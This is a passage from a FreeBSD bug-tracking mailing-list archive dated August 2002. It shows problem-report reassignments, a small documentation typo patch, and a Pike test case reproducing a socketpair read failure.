8:12: 7 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1CC5737B400; Tue, 20 Aug 2002 08:12:05 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id C173443E70; Tue, 20 Aug 2002 08:12:04 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KFC4JU043735; Tue, 20 Aug 2002 08:12:04 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KFC48v043731; Tue, 20 Aug 2002 08:12:04 -0700 (PDT) Date: Tue, 20 Aug 2002 08:12:04 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201512.g7KFC48v043731@freefall.freebsd.org> To: pavel@SLAC.Stanford.EDU, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/5932: perfmon kernel code should check for non-Intel CPUs Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: perfmon kernel code should check for non-Intel CPUs State-Changed-From-To: analyzed->feedback State-Changed-By: johan State-Changed-When: Tue Aug 20 08:09:10 PDT 2002 State-Changed-Why: As Kirs asked: Is this still relevant? Please followup by sending a mail to freebsd-gnats-submit@FreeBSD.org with the subject of this mail intact. http://www.freebsd.org/cgi/query-pr.cgi?pr=5932 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 8:34:17 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6D33337B400; Tue, 20 Aug 2002 08:34:14 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1D8DA43E65; Tue, 20 Aug 2002 08:34:14 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KFYDJU048600; Tue, 20 Aug 2002 08:34:13 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KFYDUZ048596; Tue, 20 Aug 2002 08:34:13 -0700 (PDT) Date: Tue, 20 Aug 2002 08:34:13 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201534.g7KFYDUZ048596@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, dougb@FreeBSD.org Subject: Re: conf/41801: Patch to rc.firewall to log missing firewall rules file Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Patch to rc.firewall to log missing firewall rules file Responsible-Changed-From-To: freebsd-bugs->dougb Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 08:31:41 PDT 2002 Responsible-Changed-Why: Over to Doug who is looking after etc/ I think this is a good change, if you do not want to deal with this particular change please assign it to lougi, our ipfw guru. http://www.freebsd.org/cgi/query-pr.cgi?pr=41801 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 8:41:36 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5967037B405; Tue, 20 Aug 2002 08:41:34 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id DE67C43E3B; Tue, 20 Aug 2002 08:41:33 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KFfXJU049131; Tue, 20 Aug 2002 08:41:33 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KFfXww049126; Tue, 20 Aug 2002 08:41:33 -0700 (PDT) Date: Tue, 20 Aug 2002 08:41:33 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201541.g7KFfXww049126@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-qa@FreeBSD.org Subject: Re: bin/41769: sysinstall fails to enter timezone menu Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: sysinstall fails to enter timezone menu Responsible-Changed-From-To: freebsd-bugs->freebsd-qa Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 08:41:01 PDT 2002 Responsible-Changed-Why: Over to group of maintainers. http://www.freebsd.org/cgi/query-pr.cgi?pr=41769 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 8:43: 9 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A45BF37B400; Tue, 20 Aug 2002 08:43:07 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5758243E4A; Tue, 20 Aug 2002 08:43:07 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KFh7JU050381; Tue, 20 Aug 2002 08:43:07 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KFh7fp050377; Tue, 20 Aug 2002 08:43:07 -0700 (PDT) Date: Tue, 20 Aug 2002 08:43:07 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201543.g7KFh7fp050377@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-qa@FreeBSD.org Subject: Re: i386/41757: sysinstall 4.6.x unstable Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: sysinstall 4.6.x unstable Responsible-Changed-From-To: freebsd-bugs->freebsd-qa Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 08:42:45 PDT 2002 Responsible-Changed-Why: Over to group of maintainers. http://www.freebsd.org/cgi/query-pr.cgi?pr=41757 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 8:46:38 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A50D237B400; Tue, 20 Aug 2002 08:46:35 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 964AF43E65; Tue, 20 Aug 2002 08:46:34 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KFkXJU050689; Tue, 20 Aug 2002 08:46:33 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KFkXSo050685; Tue, 20 Aug 2002 08:46:33 -0700 (PDT) Date: Tue, 20 Aug 2002 08:46:33 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201546.g7KFkXSo050685@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, grog@FreeBSD.org Subject: Re: kern/41740: vinum issues: page fault while rebuilding; inability to hot-rebuild striped plexes Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: vinum issues: page fault while rebuilding; inability to hot-rebuild striped plexes Responsible-Changed-From-To: freebsd-bugs->grog Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 08:45:46 PDT 2002 Responsible-Changed-Why: Over to vinum maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=41740 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 8:49:47 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 977FC37B400; Tue, 20 Aug 2002 08:49:45 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3133343E75; Tue, 20 Aug 2002 08:49:45 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KFnjJU050994; Tue, 20 Aug 2002 08:49:45 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KFniZ2050990; Tue, 20 Aug 2002 08:49:44 -0700 (PDT) Date: Tue, 20 Aug 2002 08:49:44 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201549.g7KFniZ2050990@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, sos@FreeBSD.org Subject: Re: kern/41651: READ_BIG errors from acd driver Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: READ_BIG errors from acd driver Responsible-Changed-From-To: freebsd-bugs->sos Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 08:49:28 PDT 2002 Responsible-Changed-Why: Over to ATA maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=41651 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 9: 7:23 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8905837B400; Tue, 20 Aug 2002 09:07:21 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 28AB143E4A; Tue, 20 Aug 2002 09:07:21 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KG7LJU059279; Tue, 20 Aug 2002 09:07:21 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KG7FT0059269; Tue, 20 Aug 2002 09:07:15 -0700 (PDT) Date: Tue, 20 Aug 2002 09:07:15 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201607.g7KG7FT0059269@freefall.freebsd.org> To: maneo@bsdpro.com, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/41556: [PATCH] wtmp patch for lukemftpd Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: [PATCH] wtmp patch for lukemftpd State-Changed-From-To: open->feedback State-Changed-By: johan State-Changed-When: Tue Aug 20 09:04:09 PDT 2002 State-Changed-Why: Can you please talk to 'lukem@netbsd.org' about this change. He is the author of lukemftpd and as you say it should be change upstream. Can you also let us know the result and we can then import the next version of lukemftpd. Please followup by sending a mail to freebsd-gnats-submit@FreeBSD.org with the subject of this mail intact. http://www.freebsd.org/cgi/query-pr.cgi?pr=41556 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 9:10:14 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2A73037B405 for ; Tue, 20 Aug 2002 09:10:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5BE2343E70 for ; Tue, 20 Aug 2002 09:10:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KGA2JU059508 for ; Tue, 20 Aug 2002 09:10:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KGA27P059507; Tue, 20 Aug 2002 09:10:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9E22037B400 for ; Tue, 20 Aug 2002 09:03:11 -0700 (PDT) Received: from smtp6.cluster.oleane.net (smtp6.cluster.oleane.net [195.25.12.7]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1A69A43E42 for ; Tue, 20 Aug 2002 09:03:10 -0700 (PDT) (envelope-from chris@daemon.entreview.com) Received: from ns1.entreview.com ([194.250.48.33]) by smtp6.cluster.oleane.net with ESMTP id g7KG33Q20169 for ; Tue, 20 Aug 2002 18:03:07 +0200 Received: from daemon.entreview.com (daemon.entreview.com [194.250.48.42]) by ns1.entreview.com (8.11.6/8.11.6) with ESMTP id g7KG3QC79202 for ; Tue, 20 Aug 2002 18:03:26 +0200 (CEST) (envelope-from chris@daemon.entreview.com) Received: from daemon.entreview.com (localhost [127.0.0.1]) by daemon.entreview.com (8.12.5/8.12.5) with ESMTP id g7KG3S3c060499 for ; Tue, 20 Aug 2002 18:03:28 +0200 (CEST) (envelope-from chris@daemon.entreview.com) Received: (from chris@localhost) by daemon.entreview.com (8.12.5/8.12.5/Submit) id g7KG3SSu060498; Tue, 20 Aug 2002 18:03:28 +0200 (CEST) Message-Id: <200208201603.g7KG3SSu060498@daemon.entreview.com> Date: Tue, 20 Aug 2002 18:03:28 +0200 (CEST) From: Christophe Juniet Reply-To: Christophe Juniet To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/41819: [PATCH] Typo in share/syscons/fonts/INDEX.fonts Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41819 >Category: bin >Synopsis: [PATCH] Typo in share/syscons/fonts/INDEX.fonts >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: doc-bug >Submitter-Id: current-users >Arrival-Date: Tue Aug 20 09:10:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Christophe Juniet >Release: FreeBSD 4.6-STABLE i386 >Organization: >Environment: System: FreeBSD daemon.entreview.com 4.6-STABLE FreeBSD 4.6-STABLE #0: Wed Jul 31 19:11:38 CEST 2002 root@daemon.entreview.com:/usr/obj/usr/src/sys/DAEMON i386 >Description: Small typo in share/syscons/fonts/INDEX.fonts >How-To-Repeat: n/a >Fix: Please apply this patch: --- patch begins here --- --- share/syscons/fonts/INDEX.fonts Wed Jul 31 19:18:02 2002 +++ share/syscons/fonts/INDEX.fonts.new Tue Aug 20 17:42:54 2002 @@ -43,7 +43,7 @@ # 8859-8 Hebrew # 8859-9 Latin5, same as 8859-1 except for Turkish instead of Icelandic # 8859-10 Latin6, for Eskimo/Scandinavian languages -# 8859-15 Latin9, same as 8859-1 except for new haracters incl. Euro/OE/oe. +# 8859-15 Latin9, same as 8859-1 except for new characters incl. Euro/OE/oe. # ################################ # Language support: MENU, FONT --- patch ends here --- >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 9:15:24 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C015B37B400; Tue, 20 Aug 2002 09:15:21 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 71BE843E42; Tue, 20 Aug 2002 09:15:21 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KGFLJU061273; Tue, 20 Aug 2002 09:15:21 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KGFLSf061269; Tue, 20 Aug 2002 09:15:21 -0700 (PDT) Date: Tue, 20 Aug 2002 09:15:21 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201615.g7KGFLSf061269@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, sos@FreeBSD.org Subject: Re: kern/41373: Infinite loop in boot process while probing ATAPI CDROM Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Infinite loop in boot process while probing ATAPI CDROM Responsible-Changed-From-To: freebsd-bugs->sos Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 09:14:35 PDT 2002 Responsible-Changed-Why: Over to ATA maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=41373 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 9:19:26 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 98FB637B4A8; Tue, 20 Aug 2002 09:19:21 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 486EA43E65; Tue, 20 Aug 2002 09:19:21 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KGJLJU061704; Tue, 20 Aug 2002 09:19:21 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KGJLhm061699; Tue, 20 Aug 2002 09:19:21 -0700 (PDT) Date: Tue, 20 Aug 2002 09:19:21 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201619.g7KGJLhm061699@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, jhb@FreeBSD.org Subject: Re: misc/41515: boot0cfg corrupts slice table Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: boot0cfg corrupts slice table Responsible-Changed-From-To: freebsd-bugs->jhb Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 09:18:25 PDT 2002 Responsible-Changed-Why: Over to boot* maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=41515 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 9:21:33 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4722437B400; Tue, 20 Aug 2002 09:21:32 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id EF05A43E65; Tue, 20 Aug 2002 09:21:31 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KGLVJU061969; Tue, 20 Aug 2002 09:21:31 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KGLVLC061964; Tue, 20 Aug 2002 09:21:31 -0700 (PDT) Date: Tue, 20 Aug 2002 09:21:31 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201621.g7KGLVLC061964@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, sos@FreeBSD.org Subject: Re: kern/41382: ATAPI TAPE hung in atrpq Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: ATAPI TAPE hung in atrpq Responsible-Changed-From-To: freebsd-bugs->sos Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 09:20:26 PDT 2002 Responsible-Changed-Why: Over to ATA maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=41382 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 9:32: 0 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 31FB537B400; Tue, 20 Aug 2002 09:31:59 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id D78C643E6E; Tue, 20 Aug 2002 09:31:58 -0700 (PDT) (envelope-from mi@FreeBSD.org) Received: from freefall.freebsd.org (mi@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KGVwJU065228; Tue, 20 Aug 2002 09:31:58 -0700 (PDT) (envelope-from mi@freefall.freebsd.org) Received: (from mi@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KGVwTB065224; Tue, 20 Aug 2002 09:31:58 -0700 (PDT) Date: Tue, 20 Aug 2002 09:31:58 -0700 (PDT) From: Mikhail Teterin Message-Id: <200208201631.g7KGVwTB065224@freefall.freebsd.org> To: mi@FreeBSD.org, freebsd-bugs@FreeBSD.org, bde@FreeBSD.org Subject: Re: docs/21024: pow() ERANGE bug Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: pow() ERANGE bug Class-Changed-From-To: sw-bug->doc-bug Class-Changed-By: mi Class-Changed-When: Tue Aug 20 09:26:57 PDT 2002 Class-Changed-Why: After getting bitten by the pow(3) inaccuracies, I was about to file a PR correcting it, but found this one alredy filed (two years old). Per Bruce's suggestion reclassify it as a documentation problem and assign to Bruce :-) Responsible-Changed-From-To: freebsd-bugs->bde Responsible-Changed-By: mi Responsible-Changed-When: Tue Aug 20 09:26:57 PDT 2002 Responsible-Changed-Why: http://www.freebsd.org/cgi/query-pr.cgi?pr=21024 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 10:26:53 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0650937B400; Tue, 20 Aug 2002 10:26:47 -0700 (PDT) Received: from mail.roxen.com (godzilla.roxen.com [194.52.182.190]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1CF8743E6A; Tue, 20 Aug 2002 10:26:46 -0700 (PDT) (envelope-from grubba@roxen.com) Received: from jms.roxen.com (jms.roxen.com [194.52.182.165]) by mail.roxen.com (Postfix) with ESMTP id 31CA599AC; Tue, 20 Aug 2002 19:26:40 +0200 (MEST) Date: Tue, 20 Aug 2002 19:26:39 +0200 (MET DST) From: =?iso-8859-1?Q?Henrik_Grubbstr=F6m?= To: Ian Dowse Cc: "freebsd-bugs@FreeBSD.org" Subject: Re: misc/22190: A threaded read(2) from a socketpair(2) fd can sometimes fail with errno 19 (ENODEV) In-Reply-To: <200208111957.g7BJvETx050200@freefall.freebsd.org> Message-ID: Organization: Roxen Internet Software AB MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=iso-8859-1 Content-Transfer-Encoding: 8BIT Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, 11 Aug 2002, Ian Dowse wrote: > Synopsis: A threaded read(2) from a socketpair(2) fd can sometimes fail with errno 19 (ENODEV) > > State-Changed-From-To: open->feedback > State-Changed-By: iedowse > State-Changed-When: Sun Aug 11 12:56:44 PDT 2002 > State-Changed-Why: > > Does this problem still occur on more recent releases? Yes, one of the machines in our build farm running FreeBSD 4.5-PRERELEASE i386 just triggered the bug: Process.create_process(): read(2) failed with ENODEV! Probable operating system bug. native module.Builtin.create_process: create(({"/bin/sleep","99999"})) testsuite:11: gnapp(7) The code I quoted in the original report has in more recent versions of Pike been changed to (excerpt): case 0: /* read() probably failed. */ default: #ifdef ENODEV if ((e < 0) && (olderrno == ENODEV)) { /* This occurrs sometimes on FreeBSD... */ Pike_error("Process.create_process(): read(2) failed with ENODEV!\n" "Probable operating system bug.\n"); } #endif /* ENODEV */ Pike_error("Process.create_process(): " "Child failed: %d, %d, %d, %d, %d!\n", buf[0], buf[1], buf[2], e, olderrno); break; Thus the different error message. The rest of the code is essentially the same. Hmm... It seems to be a different test that triggered the bug, but the end result is the same. The test that triggs the bug this time starts 10 threads, and from each of the threads starts 7*150 /bin/sleep 99999 processes one at a time, killing them immediately with SIG_KILL: /home/kiwi/xeno/client/pike/labserver.isdnet.net/buildtmp/Pike7.3-20020820-155024/src/testsuite.in:9286: Test 10069 (shift 2) failed. 0: mixed a() { 1: class Fnord 2: { 3: int gnapp(int t) 4: { 5: int e; 6: for(e=0;e<7;e++) 7: { 8: for(int d=0;d<150;d++) 9: { 10: object o=Process.create_process(({\"/bin/sleep\",\"99999\"})); 11: kill( o->pid(), 9 ); 12: o->wait(); 13: } 14: __signal_watchdog(); 15: // werror(\"%d\",t); 16: } 17: return -1; 18: } 19: 20: array start() 21: { 22: array a=({}); 23: for(int e=0;e<10;e++) 24: a+=({thread_create(gnapp,e)}); 25: return a; 26: } 27: }; 28: 29: return Fnord()->start()->wait()-({ -1 }); 30: ; } 31: mixed b() { return ({}) ; } 32: o->a(): ({ /* 1 element */ 0 }) o->b(): ({ }) > http://www.freebsd.org/cgi/query-pr.cgi?pr=22190 Thanks, -- Henrik Grubbström grubba@roxen.com Roxen Internet Software AB To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 10:29:16 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4122437B400; Tue, 20 Aug 2002 10:29:14 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id E376143E65; Tue, 20 Aug 2002 10:29:13 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KHTDJU078972; Tue, 20 Aug 2002 10:29:13 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KHTDu7078968; Tue, 20 Aug 2002 10:29:13 -0700 (PDT) Date: Tue, 20 Aug 2002 10:29:13 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201729.g7KHTDu7078968@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, ru@FreeBSD.org Subject: Re: bin/40846: deprecated test(1) options in src/include/Makefile 